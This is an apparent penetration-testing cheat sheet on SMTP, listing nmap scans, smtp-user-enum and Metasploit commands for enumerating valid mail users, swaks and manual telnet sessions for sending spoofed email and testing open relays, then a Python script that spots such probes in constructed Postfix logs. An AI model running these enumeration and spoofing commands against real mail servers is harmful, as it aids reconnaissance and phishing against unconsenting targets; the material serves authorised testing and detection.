SMTP - 25/465/587

The Simple Mail Transfer Protocol (SMTP) is a protocol used for sending and routing emails between mail servers over the internet. It works by transferring email messages from a client to a server or between servers, typically used in conjunction with other protocols like IMAP or POP3 for message retrieval.

  • Default port: 25
  • Other ports: 465 (implicit TLS), 587 (submission)

Enumeration

# Nmap SMTP Enumeration
nmap -sVC -p 25,143,110,465,587,993,995 10.10.10.10
# Service/version and default-script scan across the common mail ports; scan all of them, since custom mail server implementations may listen on any of them.
nmap -p 25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay 10.10.10.10
# Scans the SMTP ports, lists supported commands, attempts user enumeration, and checks for open relay

# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t example.com
# Uses the VRFY command to enumerate valid users

smtp-user-enum -M EXPN -U users.txt -t example.com
# Uses the EXPN command to enumerate mailing lists (less commonly supported)

smtp-user-enum -M RCPT -U users.txt -T ip_list.txt
# Sends RCPT TO commands to check for valid users (most reliable method)

# Manual via Telnet
telnet example.com 25
HELO test.com
VRFY username
MAIL FROM:<test@test.com>
RCPT TO:<user@example.com>
# Manual method to check for valid SMTP users; most servers reject RCPT TO with 503 unless MAIL FROM was sent first

# Metasploit SMTP Enumeration
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS example.com
set USER_FILE users.txt
run
# Automates SMTP user enumeration using known methods

Exploitation

# SWAKS - Swiss Army Knife for SMTP
swaks --to victim@example.com --from spoofed@attacker.com --server smtp.example.com --data message.txt
# Sends custom-crafted emails; useful for testing spam filters and relays

swaks --ehlo attacker.com --server smtp.example.com --protocol ESMTP --auth
# Tests the SMTP server's EHLO response, supported extensions, and auth options (ESMTP is required for EHLO/AUTH; --auth without a user prompts for credentials)

# SMTP Open Relay Test
swaks --to someone@external.com --from anyone@internal.com --server smtp.example.com
# If server relays this message, it’s an open relay and vulnerable to abuse

# Manual Email Injection (if telnet is allowed)
telnet mail.example.com 25
HELO attacker.com
MAIL FROM:<spoofed@attacker.com>
RCPT TO:<victim@example.com>
DATA
Subject: Test

Test message
.
QUIT
# Manual test to send spoofed or internal-looking emails; headers, a blank line, the body, then a line containing only "." ends the message
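From the receiving side, the VRFY/EXPN/RCPT enumeration and open relay probes above leave a recognisable trail in the mail server log. The following added example (not part of the original page) runs simple detection logic over constructed Postfix-style reject lines (format approximated, not captured from a real server): it flags source IPs that collect several "User unknown" rejects, which is what a user-enumeration run looks like, and separately lists IPs that were refused relaying.

```python
import re
from collections import defaultdict

# Constructed Postfix-style reject lines (approximated format, not real server output).
SAMPLE_LOG = """\
Jun 10 12:00:01 mx postfix/smtpd[4321]: NOQUEUE: reject: VRFY from unknown[203.0.113.7]: 550 5.1.1 <alice@example.com>: Recipient address rejected: User unknown in local recipient table; to=<alice@example.com> proto=SMTP helo=<test.com>
Jun 10 12:00:01 mx postfix/smtpd[4321]: NOQUEUE: reject: VRFY from unknown[203.0.113.7]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown in local recipient table; to=<bob@example.com> proto=SMTP helo=<test.com>
Jun 10 12:00:02 mx postfix/smtpd[4321]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <carol@example.com>: Recipient address rejected: User unknown in local recipient table; from=<x@test.com> to=<carol@example.com> proto=ESMTP helo=<test.com>
Jun 10 12:00:02 mx postfix/smtpd[4321]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <dave@example.com>: Recipient address rejected: User unknown in local recipient table; from=<x@test.com> to=<dave@example.com> proto=ESMTP helo=<test.com>
Jun 10 12:00:03 mx postfix/smtpd[4322]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 454 4.7.1 <someone@external.com>: Relay access denied; from=<anyone@internal.com> to=<someone@external.com> proto=ESMTP helo=<attacker.com>
Jun 10 12:00:04 mx postfix/smtpd[4323]: NOQUEUE: reject: RCPT from mail.partner.net[192.0.2.5]: 550 5.1.1 <typo@example.com>: Recipient address rejected: User unknown in local recipient table; from=<ops@partner.net> to=<typo@example.com> proto=ESMTP helo=<mail.partner.net>
"""

# Matches the command (VRFY/EXPN/RCPT), client IP, reply code and reject reason.
REJECT_RE = re.compile(
    r"NOQUEUE: reject: (?P<cmd>VRFY|EXPN|RCPT) from \S+\[(?P<ip>[^\]]+)\]: "
    r"(?P<code>\d{3}) \S+ <[^>]*>: (?P<reason>[^;]+)"
)

def analyse(log_text, enum_threshold=3):
    """Return (enumerators, relay_probes).

    enumerators: {ip: count} for IPs with at least enum_threshold
                 'User unknown' rejects (VRFY/EXPN/RCPT probing).
    relay_probes: {ip: count} for IPs that hit 'Relay access denied'.
    A single typo from a legitimate peer stays below the threshold.
    """
    unknown_by_ip = defaultdict(int)
    relay_by_ip = defaultdict(int)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if not m:
            continue
        reason = m.group("reason")
        if "User unknown" in reason:
            unknown_by_ip[m.group("ip")] += 1
        elif "Relay access denied" in reason:
            relay_by_ip[m.group("ip")] += 1
    enumerators = {ip: n for ip, n in unknown_by_ip.items() if n >= enum_threshold}
    return enumerators, dict(relay_by_ip)

if __name__ == "__main__":
    enum_ips, relay_ips = analyse(SAMPLE_LOG)
    print("possible user enumeration:", enum_ips)   # {'203.0.113.7': 4}
    print("relay attempts:", relay_ips)             # {'198.51.100.9': 1}
```

On a real server, feed it the smtpd section of the mail log and adjust the threshold and time window to the site's normal bounce rate; disabling VRFY/EXPN (Postfix `disable_vrfy_command = yes`) removes the first two probe types entirely.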